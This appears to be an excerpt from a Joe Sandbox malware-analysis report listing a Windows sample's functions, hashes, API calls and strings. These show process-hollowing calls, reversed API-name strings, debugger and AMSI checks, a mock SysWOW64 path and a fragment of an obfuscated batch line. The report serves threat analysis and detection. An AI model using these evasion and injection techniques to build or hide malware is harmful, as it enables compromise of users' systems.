Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 669f4598bca4adf8dd4e8b3b6637e43364a459319f688a10745ff92dc8ae7b6f
Instruction ID: 31727cc5df6e607e87e66a716e7c556e86ad588a4541a1b6d1e86f2f543bd3ee
Opcode Fuzzy Hash: 669f4598bca4adf8dd4e8b3b6637e43364a459319f688a10745ff92dc8ae7b6f
Instruction Fuzzy Hash: 8C41FC71A501189BEB12FBB4CDA5E9EB7FAEF8C310F21443DE041AB244DA74AD018F60

Function 027DDACC Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 027C4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 027C4EDA

RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDB9E), ref: 027DDB0B
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027DDB45
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027DDB72
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027DDB7B

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: File$AllocCloseCreateStringWrite
String ID:
API String ID: 3308905243-0
Opcode ID: 4886f44e0c2ff8a9cb9e22eeea00138d9e9aa46b19c65722582bfae178bf5a1b
Instruction ID: a6953b6f3cf82c64898f726502e625c64752106349d187a495ff9b7c1e160e3a
Opcode Fuzzy Hash: 4886f44e0c2ff8a9cb9e22eeea00138d9e9aa46b19c65722582bfae178bf5a1b
Instruction Fuzzy Hash: CC21FF72A40308BAEB21EAE4CD5AF9EB7BDEB04B04F614065B600F71C0D7B06F058B65

Function 027D85DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072

Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027D8668

Strings

CreateProcessAsUserW, xrefs: 027D85F5
Kernel32, xrefs: 027D8627

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: 46e015bbe766837c97778e216d5d203a973e479e9d1ed255f2072a05499dbc6e
Instruction ID: 28d8341e1964401d74e03354d23ba673104ebffae77e38c047b9f251e7a86121
Opcode Fuzzy Hash: 46e015bbe766837c97778e216d5d203a973e479e9d1ed255f2072a05499dbc6e
Instruction Fuzzy Hash: 5D1115BA600208BFDB51EFA8DD99F9A37FDEB0C710F624418FA08D3641C634E9118B25

Function 027D79B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072

Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027D7A27

Strings

ntdll, xrefs: 027D79FC
yromeMlautriVetacollAwZ, xrefs: 027D79CF

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: c8e7a912d36601756ebaee2ddee6cda5739fe8a3025939501872c3dff583a907
Instruction ID: 0c1ba70147921ca5b262f19a71fa6777ad4cccc54913937a16eac6dfe39b67e0
Opcode Fuzzy Hash: c8e7a912d36601756ebaee2ddee6cda5739fe8a3025939501872c3dff583a907
Instruction Fuzzy Hash: FB118875600208BFEB15DF64DC99F9E77FEEB4C710F618465B504D7640D634EA148B24

Function 027D79B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072

Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027D7A27

Strings

ntdll, xrefs: 027D79FC
yromeMlautriVetacollAwZ, xrefs: 027D79CF

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 514f25ec0e3b375e00309b9dd7159bf230a48de086af2df862c8d24626bbc1ab
Instruction ID: 191cc1ff38364705ebbf9e1f50e47dc0bf9154ed9f73675797307fde5e0fcb21
Opcode Fuzzy Hash: 514f25ec0e3b375e00309b9dd7159bf230a48de086af2df862c8d24626bbc1ab
Instruction Fuzzy Hash: 8D118875600208BFEB15DF64DC99F9E77BEEB4C710F618465B504D7640D634AA148B24

Function 027D8254 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072

Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D82C5

Strings

yromeMlautriVdaeRtN, xrefs: 027D826F
ntdll, xrefs: 027D829C

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: d5615f95f02b0bf3c1cabb63a1a3c9616114932620ae2e8b51c252840f328725
Instruction ID: e86dc26300628f109bde28dc45aeedc3fada5f65082a5c8da1988f24d17b20cd
Opcode Fuzzy Hash: d5615f95f02b0bf3c1cabb63a1a3c9616114932620ae2e8b51c252840f328725
Instruction Fuzzy Hash: 57018079600208BFEB01EFA4D899F5E77FEEB4C700F618464F504D7640D634A9158B25

Function 027D7D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072

Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D7D74

Strings

Ntdll, xrefs: 027D7D4B
yromeMlautriVetirW, xrefs: 027D7D1B

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: 24630d61e4e6f907627a4f939d9ae6a53aaf997f6eb8a3f71ffe33447f79da08
Instruction ID: 3a7261d3a8c38e71cf9f5bd0ea46291642d7b874a2f71947fc99d8f769ae424b
Opcode Fuzzy Hash: 24630d61e4e6f907627a4f939d9ae6a53aaf997f6eb8a3f71ffe33447f79da08
Instruction Fuzzy Hash: 07018079600208AFDB05EFA5DC59E9EBBFEEB4C700FA18428F504D7680D634A9148B60

Function 027D84C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072

Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D

NtUnmapViewOfSection.NTDLL(?,?), ref: 027D8529

Strings

ntdll, xrefs: 027D850C
noitceSfOweiVpamnUtN, xrefs: 027D84DF

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: 0355e0fa3264f32211b22b722e02d95081289489bcc62efd089ebb095adcc46a
Instruction ID: de134c8959dd139e754361b7693ab6aff1a72f1d109e72984f4c768267f6aa80
Opcode Fuzzy Hash: 0355e0fa3264f32211b22b722e02d95081289489bcc62efd089ebb095adcc46a
Instruction Fuzzy Hash: 3F01A778640204BFEB11EF74DC6DF5D7BBFEB49700FA28864F405D7A40D634AA058A21

Function 027DD9F0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL(?,?), ref: 027DDA6C
RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDABE), ref: 027DDA82
NtDeleteFile.NTDLL(?), ref: 027DDAA1

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: DeleteFileInitStringUnicode
String ID:
API String ID: 3559453722-0
Opcode ID: 70f3d7cceb49a65b66b88f5e76e79c2999cef016fcecc708aa9a09ccba7c11c8
Instruction ID: 49d8df17833a2cfeffcd5d841fadcd486442a089b45642e0991d8ec6f7c8e72c
Opcode Fuzzy Hash: 70f3d7cceb49a65b66b88f5e76e79c2999cef016fcecc708aa9a09ccba7c11c8
Instruction Fuzzy Hash: 2A016276A08348BEEB16E7F0CD55BDD77BDAB84704F5180929200F7081DB746F048B29

Function 027DDA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 027C4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 027C4EDA

RtlInitUnicodeString.NTDLL(?,?), ref: 027DDA6C
RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDABE), ref: 027DDA82
NtDeleteFile.NTDLL(?), ref: 027DDAA1

Part of subcall function 027C4C0C: SysFreeString.OLEAUT32(027DE950), ref: 027C4C1A

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: String$AllocDeleteFileFreeInitUnicode
String ID:
API String ID: 2841551397-0
Opcode ID: 0528a5981576d5e74d37fc9835e78feba4bab7b4b2809bb9eece9770c8367ed5
Instruction ID: 88f50c640818f467d1710603f2ba8d68863af7992c044f1c7bf3474bcde10aa5
Opcode Fuzzy Hash: 0528a5981576d5e74d37fc9835e78feba4bab7b4b2809bb9eece9770c8367ed5
Instruction Fuzzy Hash: A701F47690420CBADB21EBE4CD55FDEB7BDEB48700F614465A600F2180EB746F048A65

Function 027D6D50 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 027D6CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,027D6D41,?,?,?,00000000), ref: 027D6D21

CoCreateInstance.OLE32(?,00000000,00000005,027D6E34,00000000,00000000,027D6DB3,?,00000000,027D6E23), ref: 027D6D9F

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 1cba547bc375c16c72b6889c317b72960d7b528b81c7172983c0cdd1a0f8be09
Instruction ID: 94a0998677a27265069f908c80c4fd9430166fc42bbe59625fc0b481716f008b
Opcode Fuzzy Hash: 1cba547bc375c16c72b6889c317b72960d7b528b81c7172983c0cdd1a0f8be09
Instruction Fuzzy Hash: D901F2B1208704AEE706DF75EC6686BBFBDFB49B10B624879F905E2640E6309A00C960

Function 027DEC74 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,027EAFA1,?,?,?,000002F7,00000000,00000000), ref: 027DECAE

Part of subcall function 027D8824: LoadLibraryA.KERNEL32(00000000,00000000,027D890B), ref: 027D8858
Part of subcall function 027D8824: FreeLibrary.KERNEL32(74AD0000,00000000,02821388,Function_000065D8,00000004,02821398,02821388,05F5E0FF,00000040,0282139C,74AD0000,00000000,00000000,00000000,00000000,027D890B), ref: 027D88EB

Part of subcall function 027DEB94: GetModuleHandleW.KERNEL32(KernelBase,?,027DEF98,UacInitialize,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,ScanString,0282137C,027EAFD8,Initialize), ref: 027DEB9A
Part of subcall function 027DEB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 027DEBAC

Part of subcall function 027DEBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 027DEC00
Part of subcall function 027DEBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 027DEC12
Part of subcall function 027DEBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 027DEC29

Part of subcall function 027C7E18: GetFileAttributesA.KERNEL32(00000000,?,027DF8CC,ScanString,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanString,0282137C,027EAFD8,UacScan,0282137C,027EAFD8,UacInitialize), ref: 027C7E23

Part of subcall function 027CC2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029158C8,?,027DFBFE,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,OpenSession), ref: 027CC303

Part of subcall function 027DDBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDC80), ref: 027DDBEB
Part of subcall function 027DDBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,027DDC80), ref: 027DDC1B
Part of subcall function 027DDBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 027DDC30
Part of subcall function 027DDBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 027DDC5C
Part of subcall function 027DDBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 027DDC65

Part of subcall function 027C7E3C: GetFileAttributesA.KERNEL32(00000000,?,027E2A49,ScanString,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,Initialize), ref: 027C7E47

Part of subcall function 027C7FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,027E2BE7,OpenSession,0282137C,027EAFD8,ScanString,0282137C,027EAFD8,Initialize,0282137C,027EAFD8,ScanString,0282137C,027EAFD8), ref: 027C7FDD

Part of subcall function 027DDACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDB9E), ref: 027DDB0B
Part of subcall function 027DDACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027DDB45
Part of subcall function 027DDACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027DDB72
Part of subcall function 027DDACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027DDB7B

Part of subcall function 027D87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize,028213A4,027DA77C,UacScan), ref: 027D87B4
Part of subcall function 027D87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027D87CE
Part of subcall function 027D87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize), ref: 027D880A

Part of subcall function 027D870C: LoadLibraryW.KERNEL32(amsi), ref: 027D8715
Part of subcall function 027D870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027D8774

Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,027EB330), ref: 027E49B7

Part of subcall function 027DDA44: RtlInitUnicodeString.NTDLL(?,?), ref: 027DDA6C
Part of subcall function 027DDA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDABE), ref: 027DDA82
Part of subcall function 027DDA44: NtDeleteFile.NTDLL(?), ref: 027DDAA1

MoveFileA.KERNEL32(00000000,00000000), ref: 027E4BB7
MoveFileA.KERNEL32(00000000,00000000), ref: 027E4C0D

Strings

CreateProcessWithLogonW, xrefs: 027EA164
NtQuerySecurityObject, xrefs: 027EA70E
Advapi, xrefs: 027EA0E2, 027EA0F1, 027EA100, 027EA10F, 027EA14B, 027EA15A, 027EA169
RtlCreateQueryDebugBuffer, xrefs: 027E9E08
OpenSession, xrefs: 027DECE3, 027DEED7, 027DF7BF, 027DF8E0, 027DF9ED, 027DFB05, 027DFED9, 027E0077, 027E021D, 027E033D, 027E04D2, 027E05CA, 027E07B7, 027E095D, 027E0C8B, 027E0EB9, 027E102D, 027E1150, 027E12CE, 027E1674, 027E16F7, 027E180F, 027E1927, 027E1A33, 027E1C51, 027E1D6E, 027E200D, 027E2089, 027E229E, 027E243E, 027E2780, 027E293B, 027E2B55, 027E2C6F, 027E2F9F, 027E343E, 027E35B7, 027E373A, 027E3B77, 027E3DD5, 027E3F0F, 027E424B, 027E4493, 027E4675, 027E4749, 027E48AF, 027E4A44, 027E4D7C, 027E4F16, 027E50B6, 027E525B, 027E53CF, 027E561F, 027E56D3, 027E5990, 027E5A88, 027E5F3F, 027E6219, 027E638D, 027E6523, 027E66D3, 027E6DBC, 027E6FC1, 027E71DA, 027E727D, 027E7410, 027E77D8, 027E7A74, 027E7D71, 027E7ECA, 027E8070, 027E81FD, 027E8391, 027E8510, 027E8613, 027E8787, 027E8A05, 027E8BF5, 027E8EE6, 027E906C, 027E92A2, 027E94A8, 027E966C, 027E995B, 027E9A0A, 027E9C4A, 027E9E41, 027E9F39, 027EA3EB, 027EA9B3
C:\\Windows \\SysWOW64\\svchost.exe, xrefs: 027E36A8
RtlAllocateHeap, xrefs: 027E9D6F, 027E9DD5
@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or, xrefs: 027E4598
VirtualAllocEx, xrefs: 027EA237
